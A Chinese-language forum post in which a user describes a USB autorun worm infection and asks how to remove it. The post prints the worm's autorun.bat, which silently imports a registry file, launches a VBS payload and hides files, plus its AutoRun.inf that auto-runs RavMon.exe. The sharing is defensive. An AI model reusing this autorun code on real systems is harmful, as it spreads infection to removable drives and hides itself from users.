请专业点的人来!我们技术交流下!
我是通过移动硬盘的连接感染了这个病毒,中毒症状先发现为无法显示隐藏文件,因为病毒在注册表里把哪个项个删了,我重建的注册表后发现:
每个盘里都有这样一些文件,autorun.bat、autorun.bin、Autorun.exe、Autorun.ico、AutoRun.inf、Autorun.ini、autorun.reg、autorun.txt、autorun.vbs、autorun.wsh、RavMon.exe
---------------------
autorun.bat内容为:
@echo off
rem autorun风暴
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end
---------
AutoRun.inf里面内容为:
[AutoRun]
open=RavMon.exe
shell\open=打开(&O)
shell\open\Command=RavMon.exe
shell\explore=资源管理器(&X)
shell\explore\Command="RavMon.exe -e"
-------------------
Autorun.ini里面的内容就比较多了,我选一段吧
[AUTORUN]
CAPTION = "Driver Installation tool Ver 1.0"
LOADICON = "AUTORUN.ICO"
BACKGROUND = "BMP\menu1.BMP"
BACKGROUND16 = "BMP\menu16.BMP"
DEBUGMODE = 0
STRING1 = 01
STRING2 = 3
STRING3 = 32
STRING4 = 5
STRING5 = 4
STRING6 = 9
STRING7 = 13
STRING8 = 15
STRING9 = 1
STRING10 = 4
STRING11 = 9
STRING12 = 13
STRING13 = 15
STRING14 = 12
STRING15 = 12
请问怎么查杀!
參考答案:自动查找并删除 AutoRun 病毒相关文件 1.2
迅雷下载
